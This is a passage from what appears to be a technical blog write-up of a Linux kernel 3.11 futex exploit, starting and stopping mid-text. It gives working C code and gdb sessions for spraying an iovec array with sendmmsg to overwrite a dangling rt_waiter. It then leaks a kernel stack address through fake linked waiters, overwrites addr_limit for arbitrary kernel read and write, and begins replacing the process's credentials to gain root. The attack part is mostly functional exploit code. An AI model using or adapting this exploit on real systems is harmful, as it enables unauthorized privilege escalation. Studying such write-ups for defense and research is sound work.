<span class="k">while</span> <span class="p">(</span><span class="n">send</span><span class="p">(</span><span class="n">client_sockfd</span><span class="p">,</span> <span class="n">BLOCKBUF</span><span class="p">,</span> <span class="n">BLOCKBUFLEN</span><span class="p">,</span> <span class="n">MSG_DONTWAIT</span><span class="p">)</span> <span class="o">!=</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
<span class="p">;</span>
<span class="n">assert</span><span class="p">(</span><span class="n">errno</span> <span class="o">==</span> <span class="n">EWOULDBLOCK</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The function creates a pair of UNIX sockets of type <code class="language-plaintext highlighter-rouge">SOCK_STREAM</code> and then
sends <code class="language-plaintext highlighter-rouge">AAAAAAAA</code> over the socket until the call to <code class="language-plaintext highlighter-rouge">send</code> fails with <code class="language-plaintext highlighter-rouge">EWOULDBLOCK</code> as the <code class="language-plaintext highlighter-rouge">errno</code>.
Note the <code class="language-plaintext highlighter-rouge">MSG_DONTWAIT</code> flag, which makes <code class="language-plaintext highlighter-rouge">send</code> return immediately instead of blocking.</p>
<blockquote>
<p>MSG_DONTWAIT<br />
Enables nonblocking operation; if the operation would block, EAGAIN or EWOULDBLOCK is returned.</p>
</blockquote>
<p>Afterwards we assert that <code class="language-plaintext highlighter-rouge">EWOULDBLOCK</code> is in fact the reason the operation failed.</p>
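<p>To convince yourself that a full send buffer really is what blocks the sender, and that reading on the other end releases it, you can experiment with something like the sketch below. The three helpers are hypothetical names of mine and are not part of the exploit.</p>

```c
#include <errno.h>
#include <stdbool.h>
#include <sys/socket.h>
#include <sys/types.h>

/* Queue 8-byte chunks until the send buffer is full. Returns bytes queued. */
long fill_send_buffer(int fd)
{
    long total = 0;
    ssize_t n;

    while ((n = send(fd, "AAAAAAAA", 8, MSG_DONTWAIT)) > 0)
        total += n;
    return total;
}

/*
 * True if a send on fd would block right now.
 * Note the side effect: if it would not block, one byte is actually sent.
 */
bool send_would_block(int fd)
{
    if (send(fd, "A", 1, MSG_DONTWAIT) >= 0)
        return false;
    return errno == EAGAIN || errno == EWOULDBLOCK;
}

/* Read everything currently queued on fd. Returns bytes read. */
long drain(int fd)
{
    char buf[4096];
    long total = 0;
    ssize_t n;

    while ((n = recv(fd, buf, sizeof(buf), MSG_DONTWAIT)) > 0)
        total += n;
    return total;
}
```

<p>After <code class="language-plaintext highlighter-rouge">fill_send_buffer()</code> on one end of a <code class="language-plaintext highlighter-rouge">socketpair</code>, <code class="language-plaintext highlighter-rouge">send_would_block()</code> reports true. Once the peer calls <code class="language-plaintext highlighter-rouge">drain()</code>, it reports false again. In the exploit we never drain, which is exactly why <code class="language-plaintext highlighter-rouge">sendmmsg</code> stays parked in the kernel.</p>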
<p>Next up, we’re ready for actually invoking our <code class="language-plaintext highlighter-rouge">sendmmsg</code> to overwrite <code class="language-plaintext highlighter-rouge">rt_waiter</code>. Exciting!</p>
<p>To overwrite the waiter’s list entries properly, which is what we’re interested in,
we need to lay out the <code class="language-plaintext highlighter-rouge">iovec</code> array in userspace so that, once it is copied into <code class="language-plaintext highlighter-rouge">iovstack</code> in kernelspace, its fields line up with them.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define COUNT_OF(arr) (sizeof(arr) / sizeof(arr[0]))
</span>
<span class="k">struct</span> <span class="n">mmsghdr</span> <span class="n">msgvec</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">iovec</span> <span class="n">msg</span><span class="p">[</span><span class="mi">7</span><span class="p">];</span>
<span class="kt">void</span> <span class="nf">setup_msgs</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">i</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">COUNT_OF</span><span class="p">(</span><span class="n">msg</span><span class="p">);</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">msg</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">iov_base</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x41414141</span><span class="p">;</span>
<span class="n">msg</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">iov_len</span> <span class="o">=</span> <span class="mh">0xace</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">msgvec</span><span class="p">.</span><span class="n">msg_hdr</span><span class="p">.</span><span class="n">msg_iov</span> <span class="o">=</span> <span class="n">msg</span><span class="p">;</span>
<span class="n">msgvec</span><span class="p">.</span><span class="n">msg_hdr</span><span class="p">.</span><span class="n">msg_iovlen</span> <span class="o">=</span> <span class="n">COUNT_OF</span><span class="p">(</span><span class="n">msg</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>In this function I set up the messages, the <code class="language-plaintext highlighter-rouge">iovec</code> array, in the hope that they will overwrite the waiter’s struct once I call <code class="language-plaintext highlighter-rouge">sendmmsg</code>.
Once again, I’ve placed two breakpoints at <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a> and <a href="https://elixir.bootlin.com/linux/v3.11.4/source/net/socket.c#L1976"><code class="language-plaintext highlighter-rouge">___sys_sendmsg()</code></a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Breakpoint 1, futex_wait_requeue_pi (uaddr=uaddr@entry=0x80ff44c, flags=flags@entry=0x1, val=val@entry=0x0,
abs_time=abs_time@entry=0x0, uaddr2=uaddr2@entry=0x80ff450, bitset=0xffffffff) at kernel/futex.c:2285
(gdb) set $waiter = &rt_waiter
(gdb) cont
Continuing.
Breakpoint 3, ___sys_sendmsg (sock=sock@entry=0xc5dfda80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cfef4,
flags=flags@entry=0x0, used_address=used_address@entry=0xc78cff10) at net/socket.c:1979
(gdb) fin
Run till exit from #0 ___sys_sendmsg (sock=sock@entry=0xc5dfda80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cfef4,
flags=flags@entry=0x0, used_address=used_address@entry=0xc78cff10) at net/socket.c:1979
^C
Program received signal SIGINT, Interrupt.
(gdb) p *$waiter
$26 = {
list_entry = {
prio = 0xace,
prio_list = {
next = 0x41414141,
prev = 0xace
},
node_list = {
next = 0x41414141,
prev = 0xace
}
...
}
</code></pre></div></div>
<p>There are many interesting things to look at from this experiment. Let’s go over it.</p>
<p>Just as before, I store <code class="language-plaintext highlighter-rouge">rt_waiter</code>’s address. Upon hitting <code class="language-plaintext highlighter-rouge">___sys_sendmsg</code>, I continue the execution until the function is about to exit.
However, because the function blocks, I have to interrupt the debugger with a <code class="language-plaintext highlighter-rouge">^C</code>.
By the time the function blocks, it has already filled the <code class="language-plaintext highlighter-rouge">iovstack</code>.
I then inspect the waiter struct and see that the overwrite occurred just as I wanted it to.</p>
<p><img src="https://i.imgur.com/npV3oAT.png" alt="Waiter Overwritten Image" /></p>
<p style="text-align: center; font-style: italic"><small>(In reality there's only a single waiter)</small></p>
<p>That’s great! We can now overwrite the dangling waiter’s memory.</p>
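<p>The values in the dump follow directly from the layout. As a sanity check, here is a userspace sketch that overlays a 32-bit model of the waiter’s <code class="language-plaintext highlighter-rouge">list_entry</code> onto a model of <code class="language-plaintext highlighter-rouge">iovstack</code>. The <code class="language-plaintext highlighter-rouge">*32</code> types are stand-ins that I defined for the i386 layout, and the <code class="language-plaintext highlighter-rouge">0x24</code> offset is taken from the first gdb session, on the assumption that it stays the same across runs.</p>

```c
#include <stdint.h>
#include <string.h>

/* 32-bit stand-ins for the i386 kernel types (illustrative, not kernel headers). */
struct iovec32 { uint32_t iov_base; uint32_t iov_len; };
struct list_head32 { uint32_t next; uint32_t prev; };
struct plist_node32 {
    int32_t prio;
    struct list_head32 prio_list;
    struct list_head32 node_list;
};

#define WAITER_OFFSET 0x24  /* 0xc78cbe2c - 0xc78cbe08 */

/*
 * Fill a model iovstack the way setup_msgs() fills msg[] and return what the
 * waiter's list_entry would contain after the copy.
 */
struct plist_node32 overlay_waiter(uint32_t base, uint32_t len)
{
    struct iovec32 iovstack[8] = {{0}};
    struct plist_node32 view;
    int i;

    for (i = 0; i < 7; i++) {  /* msg[] has 7 entries */
        iovstack[i].iov_base = base;
        iovstack[i].iov_len = len;
    }
    /* Reinterpret the bytes at the waiter's offset as a plist_node. */
    memcpy(&view, (const unsigned char *)iovstack + WAITER_OFFSET, sizeof(view));
    return view;
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">overlay_waiter(0x41414141, 0xace)</code> yields a <code class="language-plaintext highlighter-rouge">prio</code> of <code class="language-plaintext highlighter-rouge">0xace</code> and list pointers of <code class="language-plaintext highlighter-rouge">0x41414141</code> / <code class="language-plaintext highlighter-rouge">0xace</code>, matching the gdb output. In other words, <code class="language-plaintext highlighter-rouge">msg[4].iov_len</code> controls <code class="language-plaintext highlighter-rouge">prio</code>, <code class="language-plaintext highlighter-rouge">msg[5]</code> controls <code class="language-plaintext highlighter-rouge">prio_list</code>, and <code class="language-plaintext highlighter-rouge">msg[6]</code> controls <code class="language-plaintext highlighter-rouge">node_list</code>.</p>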
<p>Let’s review this as a whole within the exploit code.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="o">*</span><span class="nf">forge_waiter</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">arg</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">puts</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Placing the fake waiter on the dangling node within the mutex's waiters list."</span><span class="p">);</span>
<span class="n">setup_msgs</span><span class="p">();</span>
<span class="n">setup_sockets</span><span class="p">();</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">fwait_requeue</span><span class="p">(</span><span class="o">&</span><span class="n">non_pi_futex</span><span class="p">,</span> <span class="o">&</span><span class="n">pi_futex</span><span class="p">,</span> <span class="mi">0</span><span class="p">));</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">sendmmsg</span><span class="p">(</span><span class="n">client_sockfd</span><span class="p">,</span> <span class="o">&</span><span class="n">msgvec</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">));</span>
<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">pthread_t</span> <span class="n">forger</span><span class="p">,</span> <span class="n">ref_holder</span><span class="p">;</span>
<span class="n">lock_pi_futex</span><span class="p">(</span><span class="nb">NULL</span><span class="p">);</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">pthread_create</span><span class="p">(</span><span class="o">&</span><span class="n">forger</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">forge_waiter</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">));</span>
<span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="n">assert</span><span class="p">(</span><span class="n">frequeue</span><span class="p">(</span><span class="o">&</span><span class="n">non_pi_futex</span><span class="p">,</span> <span class="o">&</span><span class="n">pi_futex</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">pthread_create</span><span class="p">(</span><span class="o">&</span><span class="n">ref_holder</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">lock_pi_futex</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">));</span>
<span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="n">pi_futex</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">frequeue</span><span class="p">(</span><span class="o">&</span><span class="n">pi_futex</span><span class="p">,</span> <span class="o">&</span><span class="n">pi_futex</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>We’ve already reviewed <code class="language-plaintext highlighter-rouge">setup_msgs()</code> and <code class="language-plaintext highlighter-rouge">setup_sockets()</code>. The call to <code class="language-plaintext highlighter-rouge">fwait_requeue()</code> blocks until the self-requeue is triggered.
As soon as it returns, <code class="language-plaintext highlighter-rouge">sendmmsg()</code> is called to overwrite the waiter, and it blocks as well.</p>
<p>You can see that I create another thread called <code class="language-plaintext highlighter-rouge">ref_holder</code>, which also attempts to lock <code class="language-plaintext highlighter-rouge">pi_futex</code> and in turn creates another waiter instance.
This is needed because the state of the futex would get destroyed if there weren’t any contending waiters on the lock.</p>
<h1 id="kernel-infoleak">Kernel Infoleak</h1>
<p>Our next goal would be to leak an address that would help us target the <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/sched.h#L1027"><code class="language-plaintext highlighter-rouge">task_struct</code></a> of our process which contains its <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/cred.h#L102"><code class="language-plaintext highlighter-rouge">cred</code></a>
so that we can overwrite it later to gain <code class="language-plaintext highlighter-rouge">root</code> privileges.</p>
<p>We do this with a fake waiter. When we attempt to lock the futex once again,
another waiter is added to the waiters list, which makes the kernel write to the adjacent nodes, and those are under our control.
Once that happens, we can read the kernel address from userspace via the fake waiter’s list nodes.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define DEFAULT_PRIO 120
#define THREAD_INFO_BASE 0xffffe000
</span>
<span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="n">fake_waiter</span><span class="p">,</span> <span class="n">leaker_waiter</span><span class="p">;</span>
<span class="n">pthread_t</span> <span class="n">corrupter</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">link_fake_leaker_waiters</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">fake_waiter</span><span class="p">.</span><span class="n">list_entry</span><span class="p">.</span><span class="n">node_list</span><span class="p">.</span><span class="n">prev</span> <span class="o">=</span> <span class="o">&</span><span class="n">leaker_waiter</span><span class="p">.</span><span class="n">list_entry</span><span class="p">.</span><span class="n">node_list</span><span class="p">;</span>
<span class="n">fake_waiter</span><span class="p">.</span><span class="n">list_entry</span><span class="p">.</span><span class="n">prio_list</span><span class="p">.</span><span class="n">prev</span> <span class="o">=</span> <span class="o">&</span><span class="n">leaker_waiter</span><span class="p">.</span><span class="n">list_entry</span><span class="p">.</span><span class="n">prio_list</span><span class="p">;</span>
<span class="n">fake_waiter</span><span class="p">.</span><span class="n">list_entry</span><span class="p">.</span><span class="n">prio</span> <span class="o">=</span> <span class="n">DEFAULT_PRIO</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">leak_thread_info</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">link_fake_leaker_waiters</span><span class="p">();</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">pthread_create</span><span class="p">(</span><span class="o">&</span><span class="n">corrupter</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">lock_pi_futex</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">));</span>
<span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="n">corrupter_thread_info</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">thread_info</span> <span class="o">*</span><span class="p">)((</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="n">leaker_waiter</span><span class="p">.</span><span class="n">list_entry</span><span class="p">.</span><span class="n">prio_list</span><span class="p">.</span><span class="n">next</span> <span class="o">&</span> <span class="n">THREAD_INFO_BASE</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Corrupter's thread_info @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">corrupter_thread_info</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Let’s first address what’s called a “Thread Info”.<br />
<a href="https://elixir.bootlin.com/linux/v3.11.4/source/arch/x86/include/asm/thread_info.h#L25"><code class="language-plaintext highlighter-rouge">thread_info</code></a> is a thread descriptor that is held within the kernel and is stored at the base of the thread’s kernel stack.
For each thread that we create using <code class="language-plaintext highlighter-rouge">pthread_create()</code>, a new <a href="https://elixir.bootlin.com/linux/v3.11.4/source/arch/x86/include/asm/thread_info.h#L25"><code class="language-plaintext highlighter-rouge">thread_info</code></a> is created in the kernel.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">thread_info</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">;</span> <span class="cm">/* main task structure */</span>
<span class="k">struct</span> <span class="n">exec_domain</span> <span class="o">*</span><span class="n">exec_domain</span><span class="p">;</span> <span class="cm">/* execution domain */</span>
<span class="n">__u32</span> <span class="n">flags</span><span class="p">;</span> <span class="cm">/* low level flags */</span>
<span class="n">__u32</span> <span class="n">status</span><span class="p">;</span> <span class="cm">/* thread synchronous flags */</span>
<span class="n">__u32</span> <span class="n">cpu</span><span class="p">;</span> <span class="cm">/* current CPU */</span>
<span class="kt">int</span> <span class="n">preempt_count</span><span class="p">;</span> <span class="cm">/* 0 => preemptable,
<0 => BUG */</span>
<span class="n">mm_segment_t</span> <span class="n">addr_limit</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">restart_block</span> <span class="n">restart_block</span><span class="p">;</span>
<span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">sysenter_return</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">sig_on_uaccess_error</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uaccess_err</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span> <span class="cm">/* uaccess failed */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>It interests us for two reasons: its address is relatively easy to obtain once you have a leak,
and, more importantly, it contains a pointer to the process’ <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/sched.h#L1027"><code class="language-plaintext highlighter-rouge">task_struct</code></a>.
Just to clarify, a new <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/sched.h#L1027"><code class="language-plaintext highlighter-rouge">task_struct</code></a> is also created for each thread.</p>
<p>In order to do the actual leak, we link together two fake waiters.
One is named <code class="language-plaintext highlighter-rouge">fake_waiter</code> which is used for general list corruption,
and the other is called <code class="language-plaintext highlighter-rouge">leaker_waiter</code> because its sole purpose is to leak addresses.</p>
<p>By linking I mean in practice that we set the previous node of the <code class="language-plaintext highlighter-rouge">fake_waiter</code> to be the <code class="language-plaintext highlighter-rouge">leaker_waiter</code>,
and set its priority to be the default priority of a task plus one so that it’ll place itself after the <code class="language-plaintext highlighter-rouge">leaker_waiter</code>.
Priority is a value that correlates to the process’ niceness.</p>
<p><img src="https://i.imgur.com/5HtvkBq.png" alt="Crafted Waiter Image" /></p>
<p style="text-align: center; font-style: italic"><small>Those aren't the actual priorities but the idea remains.</small></p>
<p>After we’ve linked the waiters in userspace,
we call <code class="language-plaintext highlighter-rouge">lock_pi_futex()</code> on another thread so that a waiter is created which attempts to add itself into the list.
Naturally, once a node is added into a list, it writes to its adjacent nodes, in our case to <code class="language-plaintext highlighter-rouge">leaker_waiter</code>.</p>
<p><img src="https://i.imgur.com/uAJDaJF.png" alt="New Waiter Image" /></p>
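<p>To make the leak mechanics concrete, here’s a minimal userspace sketch of what happens to the pointers. It is a simplified model, not the kernel’s priority list: <code class="language-plaintext highlighter-rouge">struct node</code>, <code class="language-plaintext highlighter-rouge">list_insert_between()</code> and <code class="language-plaintext highlighter-rouge">simulate_leak()</code> are hypothetical names, and the insert only mirrors the pointer updates of a regular doubly linked list insertion.</p>

```c
#include <stddef.h>

/* Simplified stand-in for a list node; the real waiter holds more fields. */
struct node {
    struct node *next;
    struct node *prev;
};

/* Both fake nodes live in memory that the "attacker" can read. */
static struct node fake_waiter;
static struct node leaker_waiter;

/* Link new_node between prev and next, like a doubly linked list insert. */
static void list_insert_between(struct node *new_node,
                                struct node *prev, struct node *next)
{
    next->prev = new_node;
    new_node->next = next;
    new_node->prev = prev;
    prev->next = new_node; /* this write lands inside leaker_waiter */
}

/* Insert kernel_waiter before fake_waiter and return what got leaked. */
static struct node *simulate_leak(struct node *kernel_waiter)
{
    /* The "linking": fake_waiter's previous node is leaker_waiter. */
    leaker_waiter.next = &fake_waiter;
    leaker_waiter.prev = &fake_waiter;
    fake_waiter.prev = &leaker_waiter;
    fake_waiter.next = &leaker_waiter;

    list_insert_between(kernel_waiter, fake_waiter.prev, &fake_waiter);

    /* leaker_waiter now holds the address of the inserted node. */
    return leaker_waiter.next;
}
```

<p>In the real exploit the inserted node lives on a kernel stack, so the value that shows up in <code class="language-plaintext highlighter-rouge">leaker_waiter</code> is a kernel stack address.</p>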
<p>Awesome! We’ve leaked a kernel stack address of one of the threads in our program.</p>
<p>In order to target its <a href="https://elixir.bootlin.com/linux/v3.11.4/source/arch/x86/include/asm/thread_info.h#L25"><code class="language-plaintext highlighter-rouge">thread_info</code></a>, all we have to do is AND its address with <code class="language-plaintext highlighter-rouge">THREAD_INFO_BASE</code>.
You can see that from <a href="https://elixir.bootlin.com/linux/v3.11.4/source/arch/x86/include/asm/thread_info.h#L174"><code class="language-plaintext highlighter-rouge">current_thread_info()</code></a>’s implementation, though that might vary across different architectures.
Here’s the source for x86.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* how to get the thread information struct from C */</span>
<span class="k">static</span> <span class="kr">inline</span> <span class="k">struct</span> <span class="n">thread_info</span> <span class="o">*</span><span class="nf">current_thread_info</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="k">struct</span> <span class="n">thread_info</span> <span class="o">*</span><span class="p">)</span>
<span class="p">(</span><span class="n">current_stack_pointer</span> <span class="o">&</span> <span class="o">~</span><span class="p">(</span><span class="n">THREAD_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">));</span>
<span class="p">}</span>
</code></pre></div></div>
<p>We now have hold of the <code class="language-plaintext highlighter-rouge">thread_info</code> location in memory.</p>
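<p>As a quick sanity check, the masking can be sketched in plain C. I’m assuming 8 KiB kernel stacks here (the usual value on 32-bit x86); <code class="language-plaintext highlighter-rouge">thread_info_base()</code> is a hypothetical helper name and the addresses in the usage note are made up.</p>

```c
#include <stdint.h>

/* Assumption: 8 KiB kernel stacks, as on 32-bit x86. */
#define THREAD_SIZE 0x2000u

/* Round a kernel stack address down to the start of its stack,
 * which is where thread_info is stored. */
static uint32_t thread_info_base(uint32_t kernel_stack_addr)
{
    return kernel_stack_addr & ~(THREAD_SIZE - 1);
}
```

<p>For example, both <code class="language-plaintext highlighter-rouge">0xc1234abc</code> and <code class="language-plaintext highlighter-rouge">0xc1235ffc</code> fall inside the same 8 KiB stack and map to <code class="language-plaintext highlighter-rouge">0xc1234000</code>.</p>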
<h1 id="overwriting-address-limit">Overwriting Address Limit</h1>
<p>Just as we can read by corrupting the list, we can use the same technique to write.
The first memory area that we’ll be targeting is what’s called the “Address Limit”.</p>
<p>It lives at <code class="language-plaintext highlighter-rouge">thread_info.addr_limit</code> as you can see in <a href="https://elixir.bootlin.com/linux/v3.11.4/source/arch/x86/include/asm/thread_info.h#L25"><code class="language-plaintext highlighter-rouge">thread_info</code></a> above.
It is used for limiting the virtual address space that is reserved for the user.
When the kernel works with user-provided addresses,
it compares them to the thread’s <code class="language-plaintext highlighter-rouge">addr_limit</code> in order to verify that it’s a valid userspace address.
If the supplied address is smaller than <code class="language-plaintext highlighter-rouge">addr_limit</code>, the designated memory area is in fact from userspace.</p>
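<p>Here’s a rough model of that comparison, written as ordinary userspace C. It is only a sketch: <code class="language-plaintext highlighter-rouge">user_range_ok()</code> is a hypothetical name, and the default limit of <code class="language-plaintext highlighter-rouge">0xc0000000</code> used in the usage note assumes the common 3G/1G split on 32-bit x86.</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* Returns true when [addr, addr + size) ends at or below addr_limit. */
static bool user_range_ok(uint32_t addr, uint32_t size, uint32_t addr_limit)
{
    /* Do the sum in 64 bits so a wrap-around cannot slip past the check. */
    uint64_t end = (uint64_t)addr + size;

    return end <= addr_limit;
}
```

<p>With a limit of <code class="language-plaintext highlighter-rouge">0xc0000000</code>, a userspace buffer at <code class="language-plaintext highlighter-rouge">0x08048000</code> passes and a kernel address such as <code class="language-plaintext highlighter-rouge">0xc1234000</code> is rejected. Raise the limit to <code class="language-plaintext highlighter-rouge">0xffffffff</code> and the same kernel address passes.</p>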
<p>The <code class="language-plaintext highlighter-rouge">addr_limit</code> is an excellent target for the initial kernel overwrite because once you overwrite it with <code class="language-plaintext highlighter-rouge">0xffffffff</code>,
you gain full arbitrary read and write capabilities over kernel memory.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">kmemcpy</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">src</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">dst</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">pipefd</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">pipe</span><span class="p">(</span><span class="n">pipefd</span><span class="p">));</span>
<span class="n">assert</span><span class="p">(</span><span class="n">write</span><span class="p">(</span><span class="n">pipefd</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">src</span><span class="p">,</span> <span class="n">len</span><span class="p">)</span> <span class="o">==</span> <span class="n">len</span><span class="p">);</span>
<span class="n">assert</span><span class="p">(</span><span class="n">read</span><span class="p">(</span><span class="n">pipefd</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">dst</span><span class="p">,</span> <span class="n">len</span><span class="p">)</span> <span class="o">==</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">escalate_priv_sighandler</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">corrupter_task</span><span class="p">,</span> <span class="o">*</span><span class="n">main_task</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">cred</span> <span class="o">*</span><span class="n">main_cred</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">root_id</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">highest_addr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span>
<span class="n">puts</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Escalating main thread's privileges to root."</span><span class="p">);</span>
<span class="n">kmemcpy</span><span class="p">(</span><span class="o">&</span><span class="n">highest_addr</span><span class="p">,</span> <span class="o">&</span><span class="n">corrupter_thread_info</span><span class="o">-></span><span class="n">addr_limit</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">highest_addr</span><span class="p">));</span>
<span class="n">printf</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Written 0x%x to addr_limit.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="n">kmemcpy</span><span class="p">(</span><span class="o">&</span><span class="n">corrupter_thread_info</span><span class="o">-></span><span class="n">task</span><span class="p">,</span> <span class="o">&</span><span class="n">corrupter_task</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">corrupter_thread_info</span><span class="o">-></span><span class="n">task</span><span class="p">));</span>
<span class="n">printf</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Corrupter's task_struct @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">corrupter_task</span><span class="p">);</span>
<span class="n">kmemcpy</span><span class="p">(</span><span class="o">&</span><span class="n">corrupter_task</span><span class="o">-></span><span class="n">group_leader</span><span class="p">,</span> <span class="o">&</span><span class="n">main_task</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">corrupter_task</span><span class="o">-></span><span class="n">group_leader</span><span class="p">));</span>
<span class="n">printf</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Main thread's task_struct @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">main_task</span><span class="p">);</span>
<span class="n">kmemcpy</span><span class="p">(</span><span class="o">&</span><span class="n">main_task</span><span class="o">-></span><span class="n">cred</span><span class="p">,</span> <span class="o">&</span><span class="n">main_cred</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">main_task</span><span class="o">-></span><span class="n">cred</span><span class="p">));</span>
